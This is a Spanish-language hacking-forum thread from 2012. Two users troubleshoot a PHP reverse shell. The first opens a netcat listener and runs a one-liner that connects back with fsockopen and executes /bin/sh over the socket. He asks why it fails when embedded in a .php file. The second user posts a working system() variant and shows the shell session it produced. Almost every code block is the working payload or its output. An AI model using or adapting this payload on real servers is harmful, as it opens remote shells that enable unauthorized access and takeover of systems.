Foro de elhacker.net

Programación => PHP => Mensaje iniciado por: MichBukana en 4 Julio 2012, 23:22 pm



Título: duda PHP
Publicado por: MichBukana en 4 Julio 2012, 23:22 pm
Hola foro tengo una duda

si pongo netcat a la escucha en el puerto 5000:
Código
  1. netcat -l -p 5000 -vv

y en otra terminal ejecuto esto:
Código
  1. php -r '$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");'

me devuelve una shell, Todo correcto ahora si creo una archivo.php y hago esto:
 //NO ME FUNCIONA, No devuelve la shell
Código
  1.  
  2.        <?php
  3.  
  4.       $ultima_linea = system("php -r '\$sock=fsockopen(\"127.0.0.1\",5000);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",$retval);
  5.        ?>        

o esto:
       
        //NO ME FUNCIONA, No devuelve la shell, Péeero si conecta....
       
Código
  1. <?php
  2.        $sock=fsockopen(127.0.0.1, 5000);
  3.        exec("/bin/sh -i <&3 >&3 2>&3");
  4.        ?>


Título: Re: duda PHP
Publicado por: it3r en 5 Julio 2012, 21:47 pm
Hola, interesante lo que posteas, podrias exaplicarme que realiza este comando?

Código:
/bin/sh -i <&3 >&3 2>&3\

se que ejecuta una shell pero mas aya de eso no entiendo :X

y en cuanto a tu problema a mi me resulto con:

Código:
system('php -r \'$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");\'');

saludos.


Título: Re: duda PHP
Publicado por: MichBukana en 5 Julio 2012, 22:03 pm
estas seguro que te conecta teniendo netcat a la escucha?
Código
  1. <php system('php -r \'$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");\''); ?>
  2.  

por que acabo de probarlo en un OS X y no me funcionó.

en que S.O. tienes el servidor con php?


Título: Re: duda PHP
Publicado por: it3r en 5 Julio 2012, 22:30 pm
fedora..

Código:
[dr@dr ~]$ nc -l 5000
sh: no job control in this shell
sh-4.1$

saludos